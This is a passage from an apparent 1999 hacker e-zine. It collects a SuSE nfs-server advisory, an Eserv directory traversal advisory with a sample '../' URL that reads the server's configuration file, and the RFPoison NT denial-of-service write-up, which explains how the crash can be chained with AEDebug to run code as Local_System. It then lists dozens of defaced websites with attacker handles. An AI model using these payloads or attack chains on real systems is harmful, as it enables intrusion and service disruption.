17th November 1999 on 4:27 pm CET The rpc.nfsd which is part of the nfs-server package was found to have two remote vulnerabilities. Link: Packet Storm http://packetstorm.securify.com/advisories/suse/suse.nfs.txt -----BEGIN PGP SIGNED MESSAGE----- ______________________________________________________________________________ SuSE Security Announcement Package: nfs-server < 2.2beta47 within nkita Date: Fri, 12 Nov 1999 02:12:50 GMT Affected SuSE versions: all Vulnerability Type: remote root compromise SuSE default package: yes (not activated by default) Other affected systems: all linux systems using the nfs-server ______________________________________________________________________________ A security hole was discovered in the package mentioned above. Please update as soon as possible or disable the service if you are using this software on your SuSE Linux installation(s). Other Linux distributions or operating systems might be affected as well, please contact your vendor for information about this issue. Please note, that that we provide this information on "as-is" basis only. There is no warranty whatsoever and no liability for any direct, indirect or incidental damage arising from this information or the installation of the update package. _____________________________________________________________________________ 1. Problem Description The rpc.nfsd which is part of the nfs-server package was found to have two remote vulnerabilities. 2. Impact Via a buffer overflow, remote root access can be achieved. Write access to the local filesystem which is exported is necessary. Another security problem are improper root_sqash export handlings. 3. Solution Updated the package from our FTP server. ______________________________________________________________________________ Please verify these md5 checksums of the updates before installing: f03592bc738b6fa5cfa2f3a21250125a ftp://ftp.suse.com/pub/suse/axp/update/6.1/a1/nkita-99.11.11-0.alpha.rpm c4fd6ad2029165a14e26140c56c64a06 ftp://ftp.suse.com/pub/suse/i386/update/6.1/a1/nkita-99.11.11-0.i386.rpm 75c7b4aa20d13f4b81428013690fbf3f ftp://ftp.suse.com/pub/suse/i386/update/6.2/a1/nkita-99.11.11-0.i386.rpm ______________________________________________________________________________ You can find updates on our ftp-Server: ftp://ftp.suse.com/pub/suse/i386/update for Intel processors ftp://ftp.suse.com/pub/suse/axp/update for Alpha processors or try the following web pages for a list of mirrors: http://www.suse.de/ftp.html http://www.suse.com/ftp_new.html Our webpage for patches: http://www.suse.de/patches/index.html Our webpage for security announcements: http://www.suse.de/security If you want to report vulnerabilities, please contact security@suse.de ______________________________________________________________________________ SuSE has got two free security mailing list services to which any interested party may subscribe: suse-security@suse.com - moderated and for general/linux/SuSE security discussions. All SuSE security announcements are send to this list. suse-security-announce@suse.com - SuSE's announce-only mailing list. Only SuSE's security annoucements are sent to this list. To subscribe to the list, send a message to: To remove your address from the list, send a message to: Send mail to the following for info and FAQ for this list: _____________________________________________________________________________ This information is provided freely to everyone interested and may be redistributed provided that it is not altered in any way. Type Bits/KeyID Date User ID pub 2048/3D25D3D9 1999/03/06 SuSE Security Team - ------BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQENAzbhLQQAAAEIAKAkXHe0lWRBXLpn38hMHy03F0I4Sszmoc8aaKJrhfhyMlOA BqvklPLE2f9UrI4Xc860gH79ZREwAgPt0pi6+SleNFLNcNFAuuHMLQOOsaMFatbz JR9i4m/lf6q929YROu5zB48rBAlcfTm+IBbijaEdnqpwGib45wE/Cfy6FAttBHQh 1Kp+r/jPbf1mYAvljUfHKuvbg8t2EIQz/5yGp+n5trn9pElfQO2cRBq8LFpf1l+U P7EKjFmlOq+Gs/fF98/dP3DfniSd78LQPq5vp8RL8nr/o2i7jkAQ33m4f1wOBWd+ cZovrKXYlXiR+Bf7m2hpZo+/sAzhd7LmAD0l09kABRG0JVN1U0UgU2VjdXJpdHkg VGVhbSA8c2VjdXJpdHlAc3VzZS5kZT6JARUDBRA24S1H5Fiyh7HKPEUBAVcOB/9b yHYji1/+4Xc2GhvXK0FSJN0MGgeXgW47yxDL7gmR4mNgjlIOUHZj0PEpVjWepOJ7 tQS3L9oP6cpj1Fj/XxuLbkp5VCQ61hpt54coQAvYrnT9rtWEGN+xmwejT1WmYmDJ xG+EGBXKr+XP69oIUl1E2JO3rXeklulgjqRKos4cdXKgyjWZ7CP9V9daRXDtje63 Om8gwSdU/nCvhdRIWp/Vwbf7Ia8iZr9OJ5YuQl0DBG4qmGDDrvImgPAFkYFzwlqo choXFQ9y0YVCV41DnR+GYhwl2qBd81T8aXhihEGPIgaw3g8gd8B5o6mPVgl+nJqI BkEYGBusiag2pS6qwznZiQEVAwUQNuEtBHey5gA9JdPZAQFtOAf+KVh939b0J94u v/kpg4xs1LthlhquhbHcKNoVTNspugiC3qMPyvSX4XcBr2PC0cVkS4Z9PY9iCfT+ x9WM96g39dAF+le2CCx7XISk9XXJ4ApEy5g4AuK7NYgAJd39PPbERgWnxjxir9g0 Ix30dS30bW39D+3NPU5Ho9TD/B7UDFvYT5AWHl3MGwo3a1RhTs6sfgL7yQ3U+mvq MkTExZb5mfN1FeaYKMopoI4VpzNVeGxQWIz67VjJHVyUlF20ekOz4kWVgsxkc8G2 saqZd6yv2EwqYTi8BDAduweP33KrQc4KDDommQNDOXxaKOeCoESIdM4p7Esdjq1o L0oixF12Cg== =pIeS - ------END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQEVAwUBOCxSlney5gA9JdPZAQEUbgf/ZhcxgxXlrIcEZnFEtiWsRqrr6qRB9jyD uV4SqRTUa6ywdO9ZWsQIAvHXI2siTaUea99CJFkDxmNIWgz9Zg2WtiUa4nvKscQv jWV7yBxBvnpZVkFfZmm7X9Lo3vQgf3+6uocy+NAoiKsLWISazUY7rdahxgE3gEAY qFN3cP9B2ABtrTuLcUbaGWy57MDuQHEC1MiMv71UtkGSkX12OtMfrSIG5IXTdbjs wIkMj0KKtJNk2W4mWgUk1U2twWXb8ZVzRJwaP1XY2S/yjF898X9FcM6AzQBdBT/3 QVQ1viXvAhvI0k7Cxy6+QALieShi4cIWn8jK6+0S+2wFODohnakC/g== =rVGR -----END PGP SIGNATURE----- @HWA 65.0 Eserv 2.50 Web interface Server Directory Traversal Vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://packetstorm.securify.com/ From owner-news@technotronic.com Thu Nov 4 22:28:55 1999 Return-Path: Received: from sword.damocles.com([209.100.46.1]) (3359 bytes) by packetstorm.securify.com via sendmail with P:esmtp/D:user/T:local (sender: ) id for ; Thu, 4 Nov 1999 22:28:53 -0800 (PST) (Smail-3.2.0.106 1999-Mar-31 #1 built 1999-Sep-18) Received: (from technomail@localhost) by sword.damocles.com (8.9.1a/8.9.1) id UAA16404 for news-resend-technotroniccom; Thu, 4 Nov 1999 20:42:27 -0600 X-Authentication-Warning: sword.damocles.com: technomail set sender to owner-news@technotronic.com using -f Received: from sword.damocles.com (vacuum@sword.damocles.com [209.100.46.1]) by sword.damocles.com (8.9.1a/8.9.1) with SMTP id UAA16399 for ; Thu, 4 Nov 1999 20:42:25 -0600 Date: Thu, 4 Nov 1999 20:42:25 -0600 (CST) From: Vacuum X-Sender: vacuum@sword.damocles.com To: news@technotronic.com Subject: Eserv 2.50 Web interface Server Directory Traversal Vulnerability Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-news@technotronic.com Precedence: bulk Status: RO ---------- Forwarded message ---------- Date: Thu, 4 Nov 1999 18:26:52 -0600 From: owner-news@technotronic.com To: owner-news@technotronic.com Subject: BOUNCE news@technotronic.com: Approval required: >From vacuum@sword.damocles.com Thu Nov 4 18:26:51 1999 Received: from ussrback.com (jupiter.hosting4u.net [209.15.2.9]) by sword.damocles.com (8.9.1a/8.9.1) with SMTP id SAA05681 for ; Thu, 4 Nov 1999 18:26:46 -0600 Received: from luck ([200.41.64.206]) by ussrback.com ; Fri, 05 Nov 1999 00:26:32 -0600 From: "Ussr Labs" To: "TECHNOTRONIC" Subject: Eserv 2.50 Web interface Server Directory Traversal Vulnerability Date: Thu, 4 Nov 1999 21:20:35 -0300 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Eserv 2.50 Web interface Server Directory Traversal Vulnerability Product: Eserv/2.50 is the complete solution to access Internet from LAN: - Mail Server (SMTP and POP3, with ability to share one mailbox on the ISP, aliases and mail routing support) - News Server (NNTP) - Web Server (with CGI, virtual hosts, virtual directory support, web-interface for all servers in the package) - FTP Server (with virtual directory support) - Proxy Servers * FTP proxy and HTTP caching proxy * FTP gate * HTTPS proxy * Socks5, Socks4 and 4a proxy * TCP and UDP port mapping * DNS proxy - Finger Server - Built-in scheduler and dialer (dial on demand, dialer server for extern agents, scheduler for any tasks) PROBLEM UssrLabs found a Eserv Web Server Directory Traversal Vulnerability Using the string '../' in a URL, an attacker can gain read access to any file outside of the intended web-published filesystem directory There is not much to expand on this one.... Example: http://127.1:3128/../../../conf/Eserv.ini to show all configuration file including account names Vendor Status: no contacted Vendor Url: http://www.eserv.ru/ Program Url: http://www.eserv.ru/eserv/ Credit: USSRLABS SOLUTION Nothing yet. @HWA 66.0 RFP9906 - RFPoison ~~~~~~~~~~~~~~~~~~ From rfp@wiretrip.net Mon Nov 1 09:20:06 1999 Date: Mon, 1 Nov 1999 08:18:50 -0600 (EST) From: ".rain.forest.puppy." To: vacuum@technotronic.com, thegnome@nmrc.org Subject: RFP9906 - RFPoison --- Advisory RFP9906 ----------------------------- rfp.labs ----------- Windows NT remote denial of service and compromise (RFPoison) ------------------------------ rain forest puppy / rfp@wiretrip.net --- Table of contents: - 1. Problem - 2. Solution - 3. Where to Get This Weapon of Mass Destruction - 4. Miscellanous Updates (Important stuff!) ----------------------------------------------------------------------- My website has been launched! Up to the minute advisories, tools, (and code fixes...heh) are available from http://www.wiretrip.net/rfp/ ----------------------------------------------------------------------- ----[ 1. Problem Interesting on how things go around/come around. Recently Luke Kenneth Casson Leighton posted a message on NTBugtraq in response to SP6 not fixing the LSA denial of service. He states that this problem is essentially "due to marshalling/unmarshalling MSRPC code being unable to cope with a NULL policy handle." He also states that they reported this problem to Microsoft around February 1999. Well, no, I did not 'rediscover' the LSA denial of service (ala the AEDebug advisory earlier this month). I did, however, discover a different denial of service based out of services.exe. When sent a specific packet, it's possible to get srvsvc.dll to choke, and cause services.exe to reference a bad memory location. For those geeks in the crowd, essentially srvsvc_netrshareenum in srvsvc.dll uses rpcrt4_ndrcomplexstructunmarshall to tweak a string, but returns a NULL. srvsvc_netrshareenum doesn't check for return value, adds four to the pointer, and passes it up a function stack until finally that memory is read (address 00000004). Blam...Dr. Watson. So we have another problem due to marshalling/unmarshalling MSRPC code. This was found independantly of Luke's info and the LSA vulnerability. The impact is pretty severe. Services.exe handles named pipes for the system. Once this crashes, everything named-pipe-based goes with it. This means logons, logouts, remote system access (registry, server functions, etc), local server management, IIS, file sharing, etc...all go down the tube. However, the box will, for the most part, appear to function normally on the local side, until you do something involving a named pipe service. The only fix is to reboot...however, the shutdown procedure waits for every (non-existant) service to respond to shutdown, and timeout. On a typical box this could cause the full shutdown procedure to push over a half-hour; therefore, hard reset is most likely needed. Also, once in a great while the bug will 'survive' during a reset. It may take two reboots to get the system back in order. Strange, yes. How, I'm not sure. But it's happened over a half dozen times across four separate boxes I've tested on. Now, I'm sure some of you are thinking "well, denial of services suck. How can I own .gov and .mil websites with this?" (hi flipz and fuqrag) Well, let's go back to David LeBlanc's response to RFP9903 (AEDebug advisory). He states, for AEDebug to really be a problem, you have to "make something crash that has higher access rights than you do." He also states "you've got to make a service go down that won't kill the machine." Bingo, this fits the bill. If we have access to change the AEDebug registry key, we can set what programs to run on crash, set autorun to True, and then crash services.exe. Our programs run as Local_System, the box is still alive (TCP/IP-wise) and usable via netcat and whatnot. A much more useful situation for a denial of service, don't you think? Also, Eric Schultze has detailed out many situations where someone could have access to your AEDebug key. I suggest you read his tidbit. It's posted as document 11 in the knowledge base on my website, available at http://www.wiretrip.net/rfp/ So far, I have been able to use this exploit on NT 4.0 server and workstation, with various levels of SP 1, 3, 5, and 6 service packs installed. I even tried applying SP 5 with the following hotfixes (in the following order): lsareq, ipsrfix, csrssfx, ioctlfx, and igmpfix. I've also tried using the Security Configuration Editor on various different 'secure' system profiles, testing to see if perhaps a registry key affected it. After all modifications, the systems were still susceptible. HOWEVER, I do have reports of two boxes *NOT* being susceptible. The reason for this, however, is unfound. Information will be released when it is found. If you come across a situation where a box is impervious to the exploit, PLEASE EMAIL ME. I would really appreciate the entire install history of that particular system. Email to rfp@wiretrip.net. ----[ 2. Solution Well, as previously stated, Luke and ISS informed Microsoft of the LSA vulnerability in February 1999. To be fair, I also reported this exact bug, along with the working exploit, to Microsoft on Oct 25th. Have not hear a word. So, in the meantime, I can recommend two things: - Block port 139 on your firewall. This, however, does not stop internal attack. - Turn off the Server service. While inconvenient, this should be deemed as a temporary solution until Microsoft releases a patch. Just for reference, shutting off the Server service will also shut down the Computer Browser service. Glitch, a fellow Wiretrip member, describes the functions of these services as follows: SERVER: Used as the key to all server-side NetBIOS applications, this service is somewhat needed. Without this service, some of the administrative tools, such as Server Manager, could not be used. If remote administration is not needed, I highly recommend disabling this service. Contrary to popular belief, this service is NOT needed on a webserver. COMPUTER BROWSER: The Computer Browser service is a function within Microsoft networking for gathering and distributing resource information. When active on a server, the server will register its name through a NetBIOS broadcast or directly to a WINS server. So you should note that turning these services off will disable the server from participating in NetBIOS-related functions, including file sharing and remote management. But realistically, how many servers need this? Alternate means of content publishing (for webservers) exist (FTP and -ugh- FrontPage). Of course this leaves the myriad of other services though. I'd be interested to see how MS SQL fairs. It's hoped that between the services.exe and the lsass.exe denial of services, both based on bad RPC code, Microsoft will find this problem worthy of fixing. Now we wait... ----[ 3. Where to Get This Weapon of Mass Destruction I use this title jokingly. But trust me, I have gone back and forth about the release of this exploit. However, as a proponent of full disclosure, I definately will release a working exploit. But I do so with conditions: - I will only release a Windows executable. - The windows executable is coded to reboot (NT) or crash (9x) upon successful execution. If you blow something up, you blow up too. - A few checks that keep the program from running if you run in a user context that does not allow the above 'safety features' to work. But it is a working executable. I'm hoping this will at least curb the script kiddie activity. Of course, I'm sure this program will be reversed and a new version made within 6 hours of posting--but that's not my problem. This should be more than enough to verify/test the exploit, and I've provided the details of how it works and the solutions necessary for stopping it. The skilled will be able to go off this, and the, well, the abusers will hit the glass ceiling as intended. Thanks to Vacuum for helping me come up with a responsible solution. Also, I want to make it very clear, before I tell you where to get the executable.... DO NOT ASK ME FOR SOURCE. DO NOT ASK ME FOR SOURCE. DO NOT ASK ME FOR SOURCE. DO NOT ASK ME FOR SOURCE. DO NOT ASK ME FOR SOURCE. DO NOT ASK ME FOR SOURCE. DO NOT ASK ME FOR SOURCE. oh, and DO NOT ASK ME FOR SOURCE. I don't care who you are. All email asking for source will be instantly deleted. I don't care if you send me the secret to life--if it has "p.s. can I get the source?" I will pipe that thing to /dev/null, along with whatever goodies you may have sent me. Don't even joke; you won't get a reply. Now that that's established, you can download RFPoison.exe from my website (of course) at http://www.wiretrip.net/rfp/ ----[ 4. Miscellaneous Updates (Important stuff!) - whisker 1.2.0 has been released! Includes the ability to bounce scans off of AltaVista (thanks to Philip Stoev) Plus some new feature additions, and new scan scripts, including a comprehensive script for scanning FrontPage (thanks to Sozni). - flipz and fuqrag have been busy hacking .gov and .mil sites. Turns out they're using a vanilla copy of msadc2.pl. Check out msadc2.pl (their exploit) at my website. - Zeus Technologies had an outstanding response to RFP9905. In under 12 hours they had a patched version available, and were all-around terrific in their private and public response. As an indication of how they do business, I would recommend Zeus Technologies as a vendor to anyone. Kudos for them. - technotronic and rfp.labs have teamed up! We're going to combine a couple of resources--starting with the mailing list. Technotronic already puts out some good info on his list...now I'll be giving the same list up to date information on rfp.labs advisories, information, and other various cool info. If you're not on it already, you may consider joining. Signup at www.technotronic.com - with the (sad?) end of octoberfest, I'm also pleased to see w00w00 take over with 'w00giving'--all through the month of November w00w00 will be releasing some more stuff! You can start looking for the first (of many) advisories today (Nov 1st). Special greetings to Simple Nomad (and others) on this special day where the wheel finishes its cycle and starts its revolution anew. --- rain forest puppy / rfp@wiretrip.net ----------- ADM / wiretrip --- So what if I'm not elite. My mom says I'm special. --- Advisory RFP9906 ----------------------------- rfp.labs ----------- @HWAA -=----------=- -=----------=- -=----------=- -=----------=- 0 0 0 o O O O 0 =----------=- -=----------=- -=----------=- -=----------=- -=----------=- =----------=- -=----------=- -=----------=- -=----------=- -=----------=- AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ _ _ /\ | | | | (_) (_) / \ __| |_ _____ _ __| |_ _ ___ _ _ __ __ _ / /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` | / ____ \ (_| |\ V / __/ | | |_| \__ \ | | | | (_| | /_/ \_\__,_| \_/ \___|_| \__|_|___/_|_| |_|\__, | __/ | |___/ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** When people ask you "Who is Kevin Mitnick?" do you have an answer? www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE EVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre http://www.2600.com/ http://www.kevinmitnick.com +-----------------------------------------------------------------------------+ | SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE | | =================== http://smog.cjb.net/ NEWS on SECURITY | | NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET | | http://smog.cjb.net/ NEWS on TECHNOLOGY | +-----------------------------------------------------------------------------+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net * * www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net * * http://www.csoft.net" One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // // or cruciphux@dok.org // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous... SITE.1 Sometimes we have zip sometimes we have lots....here's some sites to check out http://www.yaromat.com/macos8/index.htm Cool site, not security related but has a neat effect, 'converts your windows 9x box to MacOS8' - use Netscape for best results. - Duro http://www.hack.co.za Recently updated with new sections, check it out. http://www.sentinel.dircon.co.uk/ Good H/P/A site with lots of older texts and a good layout. Check it out... http://www.pfuca.com/products/hhkb/ The 'hackers' keyboard, this keyboard is a small footprint, multi-os compatible keyboard, check it out... - Ed http://www.piratecity.com/rules.htm Free underground website hosting, 20MB free, soon to have email ala hotmail too soon, check this site out if you want to run a site and are sick of the usual free provider restrictions. Rules: Our Simple Terms and Conditions NO WAREZ (pirate software) CAN BE ACTUALLY STORED ON OUR SERVERS but you can have links to warez stored elsewhere. This is because of bandwidth concerns. NO ADULT MATERIAL WHATSOEVER WILL BE TOLERATED. Please find a FREE adult website provider for such material there are many out there. NO SPAMMING! If you spam we will terminate your account immediately and notify your ISP. NO manipulation of our advertising banner or link and . This pays for your free webspace and the work that goes into Piratecity.com NO using your site as a storage site for another site or passwording your site. NO normal mundane sites, go to Fortunecity.com for that kind of stuff! That´s it. -=-s http://www.nethersearch.com/ Underground search portal with a lot of local content too, well worth checking out HWA is also mirrored there, and a lot of decent tutorials and the like can be found within this site. Check her out. http://www.bigbrotherinside.com/ Privacy advocates speak out about the branding of all PIII chips with a software recoverable id code embedded in all PIII chips, sure you can turn it off with software but be warned it can also be turned on again remotely without your knowledge, check this site out for more details. (See section 30.0 too) - Repluzer http://www.bugnet.com/ First off, Its pay which sucks. Secondly this site is a teaser with some 'free' bug alerts, and hacks, synopsis: subscribe to BUGTRAQ and visit Security Focus instead. - sAs- http://www.ussrback.com/ Security services website, offers many homegrown advisories and current exploits. Nasty background is kinda hard on the eyes but otherwise a nice layout and full of good info, watch for lots of stuff from this site in here. - Ed You can Send in submissions for this section too if you've found (or RUN) a cool site... @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ ___| _ \ | | __| _` |\ \ / | | __| _ \ _` | | | ( | ` < | | | __/ ( | \____|_| \__,_| _/\_\\___/ _| \___|\__,_| Note: The hacked site reports stay, especially wsith some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Hacker groups breakdown is available at Attrition.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist. >Hacked Sites Start<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< * Info supplied by the attrition.org mailing list. Defaced domain: www.koko.gov.my Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.koko.gov.my Defaced by: nugz Operating System: Windows NT (IIS/4.0) Defaced domain: www.clubber.co.uk Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.clubber.co.uk Defaced by: ContrOl-C Operating System: BSDI 4.0 (Apache 1.3.1.1) Defaced domain: www.pure-elite.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.pure-elite.com Defaced by: Sabu Operating System: Solaris 2.6 - 2.7 (Apache 1.3.6) Defaced domain: www.intelcities.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.intelcities.com Defaced by: HiP Operating System: Windows NT (IIS/4.0) Defaced domain: www.altavista.software.digital.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.altavista.software.digital.com Defaced by: ytcracker Operating System: Windows NT (IIS/4.0) Defaced domain: www.acerperipherals.co Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.acerperipherals.com Defaced by: ytcracker Operating System: Windows NT Defaced domain: secure.wavetech.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/secure.wavetech.com Defaced by: Uneek Tech Operating System: Windows NT Defaced domain: shadow.fnn.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/shadow.fnn.net Defaced by: fl13s cr3w Operating System: Linux (Apache 1.1.3) Defaced domain: www.record.org Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.record.org Defaced by: w0lf Operating System: Irix (Rapidsite/Apa-1.3.4) Defaced domain: www.waterworld.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.waterworld.com Defaced by: globher Operating System: Windows NT (IIS/4.0) Defaced domain: www.chicks.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.chicks.net Defaced by: h4p Operating System: Linux (Red Hat) (Apache 1.3.9) Defaced domain: sac.prodam.sp.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/sac.prodam.sp.gov.br Defaced by: globher Operating System: Windows NT(IIS/4.0) Defaced domain: www.lickass.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.lickass.net Defaced by: cowhead2000 Operating System: Linux Defaced domain: www.fesp.rj.gov.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.fesp.rj.gov.br Defaced by: globher Operating System: Windows NT Defaced domain: www.sample.burst.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.sample.burst.n Defaced by: bansh33 Operating System: Linux (Apache 1.3.9, PHP/mod_frontpage/mod_ssl) Defaced domain: www.igrejauniversal.com.br Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/www.igrejauniversal.com.br Operating System: Linux (Apache 1.2.4) Defaced domain: fanta.me.uiuc.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/fanta.me.uiuc.edu Defaced by: tonekore Operating System: Linux (Red Hat) (Apache 1.3.6) Defaced domain: shadow.fnn.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/15/shadow.fnn.net Operating System: Linux (Apache 1.1.3) Defaced domain: 198.116.6.52 Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/198.116.6.52 Defaced by: dap Operating System: RedHat Linux (Apache 1.3.6) Defaced domain: www.guardtech.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.guardtech.com Defaced by: ytcracker Operating System: Windows NT (IIS/4.0) Defaced domain: helpchat.worldnet.att.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/helpchat.worldnet.att Defaced by: ytcracker Operating System: Windows NT Defaced domain: www.statssa.gov.za Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.statssa.gov.za Defaced by: globher Operating System: Windows NT Defaced domain: www.mcdonalds.com.au Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.mcdonalds.com.au Defaced by: dukj Operating System: Windows NT Defaced domain: www.fsiferreira.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.fsiferreira.com Defaced by: dap Operating System: Linux Defaced domain: www.gcpr.org Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.gcpr.org Defaced by: rackmount Operating System: Windows NT Defaced domain: ntwww.ansys.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/ntwww.ansys.com Defaced by: rackmount Operating System: Windows NT Defaced domain: www.ofcm.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.ofcm.gov Defaced by: rackmount Operating System: Window NT Defaced domain: www.gcpr.org Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.gcpr.org Defaced by: rackmount Operating System: Windows NT Defaced domain: www.aiwa.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.aiwa.com Defaced by: rackmount Operating System: Windows NT Defaced domain: www.willieesco.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.willieesco.com Defaced by: h4x0ring f0r swedish grlz Operating System: Linux Defaced domain: beta.millicent.digital.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/beta.millicent.digital.com Defaced by: ytcracker Operating System: Windows NT (IIS/4.0) Defaced domain: www.wings.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.wings.com Defaced by: sSh Operating System: Windows NT Defaced domain: www.apptech-cc.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.apptech-cc.com Defaced by: Digital Domination Operating System: Digital Unix Defaced domain: www.crystaltips.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.crystaltips.com Defaced by: bansh33 Operating System: Linux Defaced domain: www.melissa.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/16/www.melissa.com Defaced by: p4riah Operating System: Solaris (Apache 1.3.3) Defaced domain: boubakar.cit.nih.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/boubakar.cit.nih.gov Defaced by: max Operating System: Linux Defaced domain: www-curator.jsc.nasa.gov Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www-curator.jsc.nasa.gov Defaced by: ytcracker Operating System: Windows NT Defaced domain: www.cyoc.org Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.cyoc.org Defaced by: weLLfare Operating System: Solaris Defaced domain: aabea.org Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/aabea.org Defaced by: BreAc0n Operating System: Red Hat Linux Defaced domain: www.mute300.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.mute300.net Defaced by: Sabu Operating System: FreeBSD Defaced domain: www.tcs.com.sg Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.tcs.com.sg Defaced by: Sarin Operating System: Windows NT Defaced domain: www.dare.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.dare.com Defaced by: Coolio Operating System: Irix Defaced domain: n1-3-6.irt.drexel.edu Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/n1-3-6.irt.drexel.edu Defaced by: sSh Operating System: Windows NT Defaced domain: www.babybook.net Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.babybook.net Defaced by: globher Operating System: Windows NT Defaced domain: www.hershey.com Mirror: http://www.attrition.org/mirror/attrition/1999/11/17/www.hershey.com Defaced by: Sesame Street Hackers (sSh) Operating System: Windows NT Defaced domain: www.mcdonalds.com.au Mirror: 